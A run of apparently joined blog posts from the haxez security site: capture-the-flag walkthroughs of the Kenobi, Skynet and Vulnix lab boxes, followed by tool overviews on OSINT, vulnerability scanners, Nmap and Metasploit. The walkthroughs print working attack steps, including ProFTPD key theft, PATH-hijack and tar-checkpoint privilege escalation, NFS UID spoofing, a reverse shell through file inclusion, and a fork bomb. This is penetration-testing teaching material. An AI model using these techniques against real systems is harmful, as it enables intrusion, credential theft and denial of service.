Hello World and welcome to haxez, in this post we’re going to be channeling our inner Jedi and taking on the TryHackMe Kenobi room. This room requires you to perform some enumeration to identify services. Then, you need to enumerate SAMBA, NFS, and FTP. Next, you need to exploit a vulnerability in FTP to steal Kenobi’s private key and SSH to the server. Once on the server as Kenobi, you can escalate your privileges to root via a SUID file that uses unquoted paths.
Kenobi Enumeration
First, I ran a Nmap scan with the safe scripts, service version, and operating system detection flags set. This revealed that there were 7 ports listening on the host. As can be seen, the important services found were FTP, SSH, HTTP, NFS, and Samba.
sudo nmap -sC -sV -O 10.10.182.106 -T4
Kenobi Nmap Scan
Kenobi SAMBA Enumeration
Once the Nmap scan was complete, I enumerated the SAMBA shares. There are several Nmap scripts that can enumerate Samba shares, as seen in the image below. In short, the scripts used were ‘smb-enum-shares’ and ‘smb-enum-users’. As can be seen, it was possible to identify a total of 3 shares on the host. Furthermore, the IPC$ and Anonymous shares had read and write access.
Using a tool called smbclient, it was possible to access the SAMBA shares and view the files. As a result, the Anonymous share (mapped to C:\home\kenobi\share) had a file called log.txt. I downloaded that file using the get command and opened a new tab to read the contents. Notably, the log file mentioned an SSH key being generated as well as the ProftpD service running on port 21.
Kenobi Log.txt
Kenobi NFS Enumeration
After reviewing the results of the Nmap scan from earlier, I noticed that NFS was open on ports 111 and 2049. NFS is short for Network File System and is another way to share directories and files on the network. With this in mind, I enumerated the NFS service using a number of Nmap scripts. As can be seen below, the NFS share was exposing the /var directory.
It’s time to start looking for a way to gain access to the machine. From our Nmap scan, we know that we have access to the /var NFS share. We also know that FTP is running and that at some point an SSH key was created. I used Searchsploit to look for vulnerabilities in the ProFTPD 1.3.5 service. The results indicate that there is a command execution vulnerability in this version of ProFTPD.
sudo searchsploit ProFTPD 1.3.5
Searchsploit
Exploiting FTP
Ordinarily, FTP will only grant us access to the directories and files in the directory specified in the FTP configuration file. However, as this version of FTP is vulnerable and is running as the Kenobi user, we can leverage that. We can copy the SSH key mentioned in the log file, and move it to a directory that we can access such as the NFS share /var. To do this we use the ‘SITE CPFR’ and ‘SITE CPTO’ commands as shown below.
nc 10.10.182.106 21 SITE CPFR /home/kenobi/.ssh/id_rsa SITE CPTO /var/tmp/id_rsa
Coping the Kenobi SSH Key
Stealing The SSH Key From NFS
Now that the SSH key is on the /var NFS share, we can mount that share and steal the key. In order to do this, we’re going to use the mount command. First, we need to make a directory to mount the NFS share to. I created a directory in ‘/mnt’ called kenobi2. Next, I mounted the ‘/var’ directory to that newly created directory and stole the SSH key.
Now that we have Kenobi’s SSH private key we should be able to access the machine. First we need to change the permissions on the key to 600 to please the SSH gods. Once that is done we can SSH to the box using the SSH key which will grant us our foothold into the machine.
SSH To Box
System Enumeration
Before we elevate our privileges to root and own the entire system, we need to find a way to do so. One common method of privilege escalation on the Linux system is via programs with the sticky bit set. The sticky bit means that the program retains root privileges when run by a normal user. There is more to it but I won’t explain the details in this write-up. So, we need to find all the files with the sticky bit set. The screenshot below shows the results of a find command used to find sticky bits. Essentially, it is looking for all files where the permissions have the sticky bit and then sending errors to ‘/dev/null’.
find / -perm -u=s -type f 2>/dev/null
Finding Sticky Bits on KenobiSticky Bit On Menu
Poking The Program
If you run the same command on your local system, you will notice that the ‘/usr/bin/menu’ binary is uncommon. Running this binary shows us that the program is indeed a bespoke program and it gives us three options.
Running /usr/bin/menu Binary
If we run strings against that binary, we can get an idea of what’s going on. Furthermore, we can see how the creator of this binary made a crucial mistake. We can see that the three options correspond to three system binaries (curl, uname, and ifconfig). Unfortunately for the creator, but fortunately for us, they forgot to include the full path to the binary. As this is running with the sticky bit set we can modify our ‘$PATH’ environmental variable and create our own malicious versions of these binaries.
Strings on /usr/bin/menu Binary
Kenobi Privilege Escalation
First, I changed my directory to ‘/tmp’. Then I echoed the contents of the ‘/bin/sh’ binary into a file called curl. This will be our replacement malicious binary. I then gave the newly created curl binary, read, write, and execute privileges. Finally, I exported the ‘/tmp’ path in to our ‘$PATH’ environmental variable. Now, when we run the ‘/usr/bin/menu’ binary, it will look for the binaries in the ‘/tmp’ path first. And what will it find? our malicious curl binary.
Now, when we run the ‘/usr/bin/menu’ binary and select the status check options, it runs our malicious curl binary as root and spawns a shell with root privileges.
Unlimited Power
Conclusions
This box was a lot of fun, I’m sure there was more to it that I didn’t explore. For example, there was a web server that I didn’t even look at. With the finale of the Kenobi series being released, I thought there was no better time to do a walkthrough of this box. Try and cash in on those delicious keywords. There was nothing out of the ordinary on this box, very typical enumeration and exploitation but it was still a fun box. Anyway, I hope you enjoyed the write-up, feel free to watch the video below.
Skynet… We took technology for granted. Laughed at the suffering of the robots we had enslaved. Dismissed the warnings of the mainstream media. If was over before it began. Skynet, an interconnected neural defense network became self-aware. We didn’t stand a chance.
I was sent back from the future by the leader of the resistance John Connor, my mission is to hack into the Skynet mainframe and destroy it before it becomes self-aware. I have infiltrated a Skynet data center and jacked into their network. If you’re listening to this, you are the resistance.
Hello World and welcome to haxez. Cheesy intros aside, today we’re going to be hacking the Skynet box on TryHackMe. I came upon this box while going through the Offensive Security Learning path. The Box was a lot of fun so I wanted to make a write-up and create a video about it. The foothold requires some enumeration of Samba and web services. Then exploiting an outdated Content Management System to perform local and remote file inclusion to gain a reverse shell.
Skynet Host Enumeration
I ran a Nmap scan with the safe scripts, service version, and Operating System detection flags set against all ports. The scan came back and revealed that SSH, Apache, Dovecot, and Samba were listening on the server. As a result, we have a large attack surface to go after. We could start by brute forcing SSH. However, as there are plenty of other services to go after let’s start with the web server.
Skynet Nmap Scan
Skynet Web Server Enumeration
The initial landing page of the web server appears to a Skynet search engine. However, submitting search parameters to the submission form didn’t appear to do anything. Therefore, I decided to run DIRB (with a custom wordlist) against the webserver to see if there were any juicy directories. While DIRB was running, I started to enumerate the Samba shares to see if I had access to anything.
Skynet Search EngineDirb Directory Brute Force
SMB Enumeration
I used the tool smbclient with the list argument to list the shares that were exposed on the host. Notably, there were a number of shares available but the one named anonymous caught my eye. Perhaps this anonymous share would allow me to explore it without authenticating. Success, we were able to access the anonymous share and found a number of files including attention.txt, log1.txt, log2.txt, and log3.txt. The contents of the attention.txt document revealed that the host had recently encountered a misconfiguration and that all users needed to change their passwords. The text document was signed by none other than Miles Dyson. Furthermore, the log1.txt document contained a list of terminator names. Perhaps this was a password list.
smbclient SMB Enumeration
Squirrelmail
Heading back to my DIRB scan I noticed that it had found a directory called SquirrelMail. Furthermore, upon visiting this directory we were greeted with a login page. With the username milesdyson and the log1.txt wordlist we found on the Samba share, I launched Burp Suite and started a brute force attack.
Squirrel Mail
Comparing the results of the Burp Suite brute force attack revealed that one of the attempts was successful. The response length was different and the HTTP status code showed a 302 redirect instead of a 200 message. In other words, instead of loading a page with an error message saying the credentials were incorrect, it redirected me to the mail portal.
Burp Suite Brute Force
Samba Password
I read through Miles Dyson’s emails and noticed he had received an email from [email protected]. Additionally, this email was informing Mr. Dyson that his Samba password had been changed. The email actually included the new password. Loaded with that new information, I headed back to my terminal and attempted to mount the /milesdyson share with the milesdyson username and the new password. It worked! The share was full of documents about AI neural networks but there was also a text document named important.txt This new text document mentioned a Content Management System under a new directory. This directory was a random combination of letters and numbers so it is unlikely that a directory brute force attack would have found it.
Miles Dyson Samba Directory
Deeper Directories
Armed with this new directory, I ran another DIRB against it and found that there was a directory called administrator. Navigating to this directory loaded a new login portal for a Content Management System called Cuppa CMS.
Cuppa CMS
After trying some basic credentials I went back to my terminal and used searchsploit to see if there were any vulnerabilities. Sure enough, there was a local and remote file inclusion vulnerability that would allow a threat actor to load local files on the system such as the passwd file as well as force the server to execute files hosted remotely.
SearchSploit
Catching A Reverse Shell
After testing out the local file inclusion vulnerability, I headed to Pentestmonkey’s PHP reverse shell on Github.com. I grabbed the raw URL and downloaded it locally and then amended it to include my IP address and desired port of 443. Then I used the Python3 HTTP module to start a webserver on port 80. I created a NetCat listener on port 443 and then appended the link to the reverse shell into the Cuppa CMS URL. After hitting enter I was greeted with that glorious message of Connect to from unknown. The reverse shell had worked and I was now on the system.
Reverse Shell
Skynet System Enumeration
I poked around on the system for a bit and was able to capture the user flag from the milesdyson home directory. I also noticed a backup.sh file that appeared to be backing up everything in the /var/www/html directory with Tar. Furthermore, this backup.sh script was owned by root. I decided to cat out /etc/crontab to see whether this was running as a cron job. Sure enough, it was, the job was running as root every hour, minute, and second.
Skynet Enumeration
Skynet Privilege Escalation
The end to Skynet was within reach. I headed over to GTFO bins and searched for Tar. There was an entry for Tar using a feature called checkpoints. These checkpoints allow for the execution of arbitrary actions or commands. By creating a checkpoint I could instruct Tar to execute a command of my choosing. Based on a write-up on https://steflan-security.com I decided to create a bash script that copied /bin/bash to /tmp and then change the permissions to include the setUID bit. This means that when the backup.sh cron job runs, Tar would create a bash binary in /tmp that would elevate me to root. After a bit of trial and error, the exploit worked and by appending the -p argument I was able to get root and capture the root flag.
Privilege Escalation
Conclusions
This was a great box and I loved the theme of it. I don’t know why but I always find boxes with a strong theme more engaging. It’s like the websites on hackthissite.org, if I’m supposed to be hacking some super evil person then I’m more inclined to succeed. Perhaps my imagination is running away with me. Either way, this is a great box, I would personally rank it as a medium difficulty box mainly because I struggled with the last step. I had to terminate (excuse the pun) the existing machine and start again to get it to work. I loved the remote file inclusion vulnerability, that was insanely cool. Anyway, until next time. Kind Regards.
Hello world, thank you for stopping by HaXeZ! In this article, I will be going through the VulnHub box Vulnix. This box requires you to perform some basic reconnaissance to discover services. You then need to abuse those services to gather more information that can be used with other attacks. I like this box as the scenario it presents is realistic. It is also a good box for learning about the Network File System service.
Vulnix Reconnaissance
First, we need to see what the IP of the box is. In order to do this, we can perform a ping sweep of our host-only network and see what responds. As you can see from the output below, it appears that our target IP address is 192.168.56.105.
┌──(kali㉿kali)-[~] └─$ sudo nmap -sP 192.168.56.0/24 [sudo] password for kali: Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 16:46 EDT mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for 192.168.56.1 Host is up (0.00016s latency). MAC Address: 0A:00:27:00:00:0B (Unknown) Nmap scan report for 192.168.56.100 Host is up (0.00021s latency). MAC Address: 08:00:27:F3:D2:81 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.105 Host is up (0.00060s latency). MAC Address: 08:00:27:01:3D:75 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.102 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 1.83 seconds
Next, we need to see what services are listening on the box. In order to do this, we can run a Nmap TCP scan which performs banner grabs on all ports. As you can see we have a number of services such as SSH, SMTP, Finger and NFS.
┌──(kali㉿kali)-[~] └─$ sudo nmap -sC -sV -sT -p0- 192.168.56.105Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 16:47 EDT mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for 192.168.56.105 Host is up (0.00017s latency). Not shown: 65519 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 25/tcp open smtp Postfix smtpd |_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, 79/tcp open finger Debian fingerd 110/tcp open pop3 Dovecot pop3d 111/tcp open rpcbind 2-4 (RPC #100000) 143/tcp open imap Dovecot imapd 512/tcp open exec netkit-rsh rexecd 513/tcp open login OpenBSD or Solaris rlogind 514/tcp open shell Netkit rshd 993/tcp open ssl/imap Dovecot imapd 995/tcp open ssl/pop3 Dovecot pop3d 2049/tcp open nfs_acl 2-3 (RPC #100227) MAC Address: 08:00:27:01:3D:75 (Oracle VirtualBox virtual NIC) Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -1s, deviation: 0s, median: -1s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.30 seconds
Vulnix SMTP User Enumeration
We can see port 25 is open so we can use this to enumerate users using the VRFY command. There are a number of tools that can perform this enumeration. Nmap has an NSE script that can enumerate users but there are also independent Python and Perl scripts as well as a Metasploit module. We’re going to use the meta sploit module and set the RHOSTS to the IP address of the target.
We know from the Nmap scan that the Finger service is listening. This service should also allow us to enumerate users. We already have a good wordlist from the SMTP user enumeration but lets enumerate Finger to get as much information out of Vulnix as possible.
Now that we have a good list of users, we can attempt to brute force SSH in order to gain access to the host. To do this we will use the THC Hydra brute forcing tool with our usernames wordlist and the rockyou password list.
While Hydra is running we can continue probing the services on the box for more information. Our Nmap scan showed us that the Network File Service or NFS Service was listening. We can use a tool called showmount to see if there are any exports or shares available.
┌──(kali㉿kali)-[~/Documents] └─$ sudo showmount -e 192.168.56.105 Export list for 192.168.56.105: /home/vulnix *
Based on the information from showmount we can attempt to mount the /home/vulnix mount that we found. However, when we try to list out the contents of /mnt/vulnix, we get a permission denied error.
┌──(kali㉿kali)-[~/Documents] └─$ sudo mkdir /mnt/vulnix ┌──(kali㉿kali)-[~/Documents] └─$ sudo mount 192.168.56.105:/home/vulnix /mnt/vulnix -o vers=3┌──(kali㉿kali)-[~/Documents] └─$ ls /mnt/vulnix ls: cannot open directory '/mnt/vulnix': Permission denied
The mount command I used above mounts the NFS share using an older version. The reason for this is so that we can see the Username and UID. While we don’t have permission to see the contents of the directory, we can still see the directory. You can see below that the UID is 2008. You can also so that the username is vulnix.
┌──(kali㉿kali)-[~/Documents] └─$ ls -lash /mnt total 52K 4.0K drwxr-xr-x 4 root root 4.0K May 7 16:36 . 40K drwxr-xr-x 19 root root 36K Apr 26 11:40 .. 4.0K drwxr-x--- 4 vulnix vulnix 4.0K May 7 15:39 vulnix┌──(kali㉿kali)-[~/Documents] └─$ ls -laShn /mnt total 52K drwxr-xr-x 19 0 0 36K Apr 26 11:40 .. drwxr-xr-x 4 0 0 4.0K May 7 16:36 . drwxr-x--- 4 2008 2008 4.0K May 7 15:39 vulnix
Vulnix Foothold
A common misconfiguration in NFS allows us to create a user with the same username and same UID to access the files.
Next, we generate the SSH key that we are going to copy across and use to access the server. However, as this box is quite old and modern systems no longer supper ssh-rsa, we need to specify that method.
Now that we have our private and public keys, we can copy our public key onto the mount point. We need to copy it into the .ssh directory with the name authorized_keys.
We can now SSH to the box using our private key and it should allow us to log in as the vulnix user. However, as with creating the key, we need to tell our SSH client to accept the old ssh-rsa algorithm.
┌──(vulnix㉿kali)-[~] └─$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i id_rsa [email protected] Warning: Identity file id_rsa not accessible: No such file or directory. Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686) * Documentation: https://help.ubuntu.com/ System information as of Sat May 7 22:22:42 BST 2022 System load: 0.0 Processes: 92 Usage of /: 90.3% of 773MB Users logged in: 1 Memory usage: 1% IP address for eth0: 192.168.56.105 Swap usage: 0% => / is using 90.3% of 773MB Graph this data and manage this system at https://landscape.canonical.com/ Last login: Sat May 7 21:24:35 2022 from 192.168.56.102 vulnix@vulnix:~$
Privilege Escalation
We now have SSH access to the box as the user vulnix. We still need to root the box though. The first thing to do is to see whether we have sudo.
vulnix@vulnix:~$ sudo -ll Matching 'Defaults' entries for vulnix on this host: env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User vulnix may run the following commands on this host: Sudoers entry: RunAsUsers: root Commands: sudoedit /etc/exports RunAsUsers: root Commands: NOPASSWD: sudoedit /etc/exports
It would appear that we have limited sudo access which allows us to sudoedit /etc/exports without a password. The /etc/exports file is what we use to configure NFS. This file allows us to specify which parts of the filesystem are accessible to the public. Here we can configure the root user’s home directory as an NFS share.
vulnix@vulnix:~$ sudoedit /etc/exports # /etc/exports: the access control list for filesystems which may be exported # to NFS clients. See exports(5). # # Example for NFSv2 and NFSv3: # /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check) # # Example for NFSv4: # /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) # /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) # /home/vulnix *(rw,root_squash) /root *(rw,no_root_squash)
In order to make the changes, we need to hard reboot the machine. This isn’t the best option as we don’t have permission to run a reboot and we may not have physical access to the server. Unfortunately, this is the only option we have at this stage. We could run a fork bomb ((){ :|:& };:) to exhaust the resources on the system and force it to reboot but we will just reboot it.
Vulnix Getting root
Once the system has rebooted, we can run the showmout tool again to see if the root user’s home directory has been shared.
┌──(kali㉿kali)-[~] └─$ sudo showmount -e 192.168.56.105 Export list for 192.168.56.105: /root * /home/vulnix *
Fantastic, the root user’s home directory has been shared. We should now be able to make another directory and mount it.
With the root user’s home directory mounted, we can now repeat the process of copying an SSH public key into the authorized_keys file. First, we need to create the .ssh directory. Next, we need to create a new SSH key pair (ensuring to specify the rsa-ssh type). After that, we have to copy the public key to the SSH directory and call it authorized_keys.
┌──(kali㉿kali)-[~] └─$ sudo mkdir /mnt/vulnroot/.ssh ┌──(kali㉿kali)-[~/Documents] └─$ ssh-keygen -t ssh-rsa Generating public/private ssh-rsa key pair. Enter file in which to save the key (/home/kali/.ssh/id_rsa):┌──(kali㉿kali)-[~] └─$ sudo cp .ssh/id_rsa.pub /mnt/vulnroot/.ssh/authorized_keys
Finally, we can see to the box as root and capture the trophy… although we could have captured it when we mounted the NFS share. Wheres the fun in that.
┌──(kali㉿kali)-[~] └─$ sudo ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i .ssh/id_rsa [email protected] Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686) * Documentation: https://help.ubuntu.com/ System information as of Sat May 7 22:37:31 BST 2022 System load: 0.0 Processes: 93 Usage of /: 90.3% of 773MB Users logged in: 2 Memory usage: 1% IP address for eth0: 192.168.56.105 Swap usage: 0% => / is using 90.3% of 773MB Graph this data and manage this system at https://landscape.canonical.com/Last login: Sat May 7 21:42:13 2022 from 192.168.56.102 root@vulnix:~# cat trophy.txt cc614640424f5bd60ce5d5264899c3be
So that’s it, the box is owned, we captured the key and learned all about NFS along the way. As for that Hydra session that was running, I believe it found a password for the user named user and it was ‘letmein’. Not that we needed it.
Hello world, welcome to haxez where I want to talk about OSINT or Open-source intelligence and passive reconnaissance. Passive Reconnaissance is one of the most important phases for successful hacking. Passive Reconnaissance uses Open Source Intelligence (OSINT) techniques to gather information about the target. To explain, we attempt to gather information about the target without interacting with it. For this reason, this article is going to cover a number of Passive Reconnaissance tools but there are plenty more out there.
Google Passive Reconnaissance
Google is an extremely powerful search engine. They didn’t become the number one search engine by luck. Usually, most people use google by popping in word and looking through the results. However, with a few modifications to your search terms, Google can be a powerful Passive Reconnaissance tool. In essence, using specific search operators can retrieve a wealth of information from google. Additionally, the Exploit Database has a whole section dedicated to “Google Dorks” which can return potentially sensitive information about a target. Below are just a few examples.
Google Passive Reconnaissance
Maltego Passive Reconnaissance
Maltego is an open-source intelligence gathering application that allows you to gather information about a target domain. In short, it has a number of transforms that will automatically perform passive reconnaissance techniques. Furthermore, these transforms include various DNS record look-ups from various sources. Email addresses and telephone numbers and various other bits of information. Overall, the interface provides an intuitive and friendly method of viewing the information retrieved. Within a few clicks, you can have a wealth of information that could allow you to find weaknesses in your target. Simply right an entity and chose from the list of transforms.
Have I been Pwned? is a web application that allows you to check whether the credentials of a mailbox have been compromised. Notably, It utilizes known database leaks and checks whether your email address was part of those leaks. These leaks are from various sources including public leaks such as the Linked In database leak. Have I Been Pwned? was created for you to check your own email address but there is nothing stopping you from checking other peoples too.
MXToolBox is a web application that has a great number of tools. I initially discovered this tool while working in Technical Support for a hosting provider. It can be used to gather information about a domain’s DNS records. Furthermore, it has tools like ping so if you want to see whether an IP is blocking you, you can check on here rather than switching VPN locations. To cover all the tools would require an entire article but this is a great tool to perform passive reconnaissance against a target.
Shodan is a search engine for internet-connected devices. It can be used to find specific devices with specific operating systems with specific ports open. It has also indexed the various banners that those ports display when connecting to them. Furthermore, it also checks to see whether those devices are using weak credentials. You can filter devices by country, city, organization, and domain, the list of flags is endless. If you wanted to find all FTP servers owned by a certain organization that supports anonymous login then you can.
The OSINT Framework is a web application that catalogs everything you could want to know about Open Source Intelligence Gathering. It has a horizontal hierarchical structure and clicking one category will provide other categories and eventually a link to a resource. The resource will usually provide instructions or a tool for you to perform that specific type of OSINT. This web application has a lot to explore, more than can be covered in a single article.
The Whois is a tool that can gather information about the registration of a domain. In some cases, it may tell you who registered it and include their contact details but this will depend on the domain privacy settings. This information could include the domain owners’ telephone number as well as their addresses. Furthermore, the owner information, domain registration date, and expiry date can also be provided by the tool.
whois google.com
Whois
NSlookup
You can use the nslookup tool to retrieve information about a domain. The information can include the domains name servers, the IP address, the mail servers, and various other records. It can tell you how the domain is configured, provide certain records, and may identify potential targets.
NSlookup
theHarvester
A tool that combines all of these techniques into one great command-line tool is the Harvester. The Harvester is a wrapper for other tools and can perform passive and active reconnaissance. It can use search engines to find subdomains and URLs. Additionally, It can use social media websites to find employee names and email addresses. To find the full list of tools utilized by theHarvester, head over to the developer’s GitHub page.
Passive reconnaissance can provide a wealth of information about a target that you are testing. While some of the information may be beyond the scope of the engagement, it can give you a good insight into their organization. The tools I’ve talked about above barely scrape the surface of the iceberg that is OSINT tools. Perhaps one day someone will create an and all in one, web-based OSINT scanner and it will become what Nessus is to vulnerability scans. I’m fond of Maltego and theHarvester and think they do a fantastic job but would love more functionality and a simpler interface. Input your domain, tick the boxes of what information you want to discover and then wait for the report.
Hello World and welcome to haxez, today I’m going to be covering Vulnerability Scanning. Vulnerability scanning is the process of using tools to scan your target for vulnerabilities. There are many different tools that can perform vulnerability scans and the type of target you are scanning will determine what tools you use. For example, if you’re looking for vulnerabilities that affect services on the host then you could use Nmap, Nessus, OpenVAS, and many others. However, if you’re attacking a web application then you would likely use Nikto, Burp Suite, OWASP ZAP, or some other tool.
Nmap Vulnerability Scanning
If you haven’t seen my post on Nmap then I would recommend giving it a read. It covers Nmap in more detail than I intend to do here. With that said, Nmap is a fantastic vulnerability scanner. Early in my IT career, I had many misconceptions about Nmap. I thought it was merely a network scanner used to identify what hosts were online and what services were running. How naive, Nmap is a comprehensive network auditing tool that can identify and exploit vulnerabilities. I use it on almost every project I’m on. I highly recommend reading more about the different flags and scripts before recklessly running them like I’m about to do.
The image below shows the output of a Nmap scan configured to find vulnerabilities. You can see from the results that it has found some CVEs. I first specified the ‘-g’ flag to set the source port to 53. This is useful for firewall evasion as some firewalls may be configured to allow DNS traffic in from any source. I then specified the ‘-f’ flag to fragment the packets. This works by splitting the packets into multiples of 8 which can also be beneficial for firewall evasion. Then, I specified ‘-sV’ to get the service versions and ‘-p0-‘ for all ports. Next, I specified the ‘–script’ argument followed by various categories of scripts to execute. Finally, I added the IP address and the ‘-T5’ to speed it up.
This configuration is incredibly reckless and you should never use it against production environments. I’m merely using it to demonstrate the power of Nmap. Do NOT do this.
Where to start! Nessus from Tenable is a powerful multifunctional vulnerability scanning and auditing solution. It can be used to scan entire ranges of IP addresses or perform audits from uploaded configuration files. Whether you’re on team red or blue, chances are you’ve used it or at least heard of it. Nessus is likely going to be your tool of choice when performing vulnerability assessments or full-on penetration tests. I will probably create a separate article and video focusing on Nessus as part of the Hacker Tools series. All you need to know for the moment is that it is an effective vulnerability scanner. They offer an essential version for you to play around and I highly recommend giving it a go. However, the professional version has many more cool toys.
The image below is of an advanced scan that I performed against the Metasploitable 2 virtual machine. I configured it to scan all ports (0–65535) and turned off the Denial of Service plugin. Other than that I only changed the reporting to report as much as possible. As you can see it has found a bunch of issues (as expected).
Nessus Vulnerability Scanning
Nikto Web Application Scanning
Nikto is a free CLI web application vulnerability scanner. It will search for interesting directories and files, analyze response headers, check for outdated software, and look for vulnerabilities. It’s a good place to start when performing web application security assessments. Granted, it won’t hack into the website for you, but it will give you a good idea of things to look at during the early stages of the assessment. Nikto can be intrusive and I have seen web applications suffer performance issues when scanning them. However, the hardware that those apps were hosted on wasn’t fit for purpose. I’ve also found that Nikto can be tricked by web application firewalls. It will report a 200 response for every directory that it brute forces, even though it doesn’t exist. Or it will misidentify a vulnerability or some other incorrect server-side configuration.
Nikto Web Application Scanning
Burp Suite Web Application Scanning
No vulnerability scanning article would be complete without Burp Suite from Portswigger. This is the Bugatti Veyron of web application vulnerability scanners. Unfortunately, I only have the community version installed in my home lab but I use the pro version almost daily. The pro version has many more features that allow for automated scanning and vulnerability detection. You still need to manually go through and verify those findings but Burp takes out a lot of the guesswork. It also has an extensive list of additional plugins that you can install to increase the functionality. If you’re looking to get a job in cybersecurity then knowing how to use Burp Suite will probably improve your chances once it comes to that technical test.
Burp Suite Web Application Scanning
Conclusions
I know I have only scraped the surface on the different vulnerability scanners that are available. However, to cover them all would take forever and I only wanted to cover the ones that you are likely to come across first. Granted there are some amazing alternatives out there. Where you have Nessus, you also have OpenVAS. Where you have Burp Suite, you also have OWASP Zap. I’m not saying that one is better than the other, I suppose that comes down to personal preference and these tools are my personal preference. I know a guy who almost refuses to touch anything that isn’t command line based. Archie, I salute you. Anyway, definitely give these tools a try against your own test virtual machines. They are a lot of fun.
Hello world, welcome to haxez where today I’m going to be talking about the network mapping tool Nmap. Nmap is a network scanner and was created by Gordon Lyon. It can be used to discover hosts on a network by sending packets to those hosts and then analyzing the responses. In other words, it can help you map out a target network. As a result, Nmap among other tools like Mass Scan is an essential tool for your ethical hacking tool kit. I use it on almost every engagement.
Nmap Host Discovery
As mentioned previously, Nmap can be used to discover hosts on a network. This can be done a number of ways but the most common is known as a ping sweep. A ping sweep does exactly that, it pings every host in the specified range and waits for a response to see if the host is online.
sudo nmap -sP 10.10.10.0-255
This can also be done without DNS resolution.
sudo nmap -sP 10.10.10.0-255 -n
However, this method isn’t full proof as hosts could have ICMP disabled meaning that they won’t respond to pings.
Nmap Ping Sweep
Nmap TCP Port Scan
The Nmap tool can also scan hosts and determine what TCP ports are open. This is done by initiating a three-way handshake with the host and analyzing the response. You can specify which ports or let it only scan the top 100 or 1000 ports. Additionally, you can also add service version detection to the scan by adding the ‘-sV’ argument.
sudo nmap -sT -sV -p0- 10.10.10.10
Nmap TCP Scan
Nmap UDP Port Scan
Moreover, Nmap can also perform a UDP scan against the hosts. However, because UDP is a stateless protocol whereby the sending continues to send regardless of whether the host has responded, it can take time to determine whether a port is open.
sudo nmap -sU -p0- 10.10.10.10
Nmap Scripting Engine
One of the most powerful features of Nmap is its scripting engine. If you’re just starting out in computing or cyber, you could be forgiven for not knowing about it. Nmap is far more than a network scanner, it is a complete penetration testing framework. If you bring up your terminal and type in:
sudo locate *.nse
Nmap NSE Scripts
You can see the insane amount of scripts available for you to use against your targets. These scripts range from purely informational to exploitative. The scripts can be updated by running the following command.
sudo nmap --script-updatedb
SSL Scripts
One thing that I do frequently on an engagement is to test the configuration of the SSL certificate. This helps to ensure that all communication sent to and from the host is done so securely. Furthermore, it also helps to ensure that no specially crafted packets can be sent to the host to retrieve sensitive information.
sudo nmap --script ssl-cert -p 443 haxez.org
The command below can be used to enumerate the SSL ciphers and check for weak ones.
There is also a script that can perform DNS zone transfers. While there are other tools like dig and fierce that have a far less complex syntax, if you’re in a pinch and only have Nmap then it’s nice to know the option is there. This can be done by running the following command.
So, if you’re on an engagement and you notice TCP port 53 is open. You could grab an absolute wealth of information by performing a DNS zone transfer.
Nmap DNS Zone Transfer
SMB Share Enumeration
Imagine you’ve stumbled into a network and you’ve scanned a host and noticed that port 445 is open. You know that this is the port for Server Message Block or SMB for short. You also know that this port is used to share files and folders/directories across the network. Wouldn’t it be great if there was a way to see what shares were being shared? Well, there’s a script for that.
Ok so you now know what the shares are but you don’t know any users on the system that would have the privileges to access them. Well, there is a script for that which allows you to enumerate the users of the system via the SMB share.
So you now have a list of usernames but what do you do with them? Are there any other services that you can see? What’s that? Its running FTP? Why not brute force that service with Nmap’s FTP Brute force script.
You notice another box or that the same box is running the remote management protocol SSH. You have a list of users and some passwords which you got from the FTP service. Why not use that wordlist to go attack the SSH login too.
There are some other arguments that could help you with your scans too. If you wanted to see exactly what Nmap is doing then you could increase the verbosity.
-v1 -v2 -v3
Increase Speed
Or if Nmap is running too slowly then you could increase the speed by adding a T4 argument to your scan. Be careful though as some systems with minimal resources might be offended by your scan and decided to crash due to resource exhaustion.
-T1 -T2 -T3 -T4
Conclusion
There are so many other types of scans like Syn scans, and Xmas scans that I could talk about. I could spend weeks talking about all the different scripts available. I don’t want to make this article too long though. Hopefully, I’ve covered enough to get you started with Nmap and to realize its enormous potential. I use it on almost every test that I do simply because it has almost everything I need. That isn’t to say I don’t verify the results with other tools, but it is usually my starting point on any engagement once the passive reconnaissance is out of the way.
Hello world, welcome to haxez where today we’re talking about Metasploit. The Metasploit framework is an essential tool for any aspiring hacker or penetration tester. It comes preinstalled on many penetration testing distributions including Kali Linux. It is a framework that allows the user to select from a plethora of powerful tools. Furthermore, the user can then configure those tools with various options including the target’s IP address and port number.
Initializing Metasploit
As mentioned previously, several security-focused Linux distributions come with Metasploit preinstalled. However, you might need to initialize the database on first use. You can use the PostgresSQL database for many things including workspaces. Executing the ‘msfdb’ command will initialize the Metasploit Database.
Metasploit can but launched using the ‘msfconsole’ command. It may take a moment, but eventually, it will load. Keep an eye out for the unique ASCII art each time you load the tool, especially the goose… HONK.
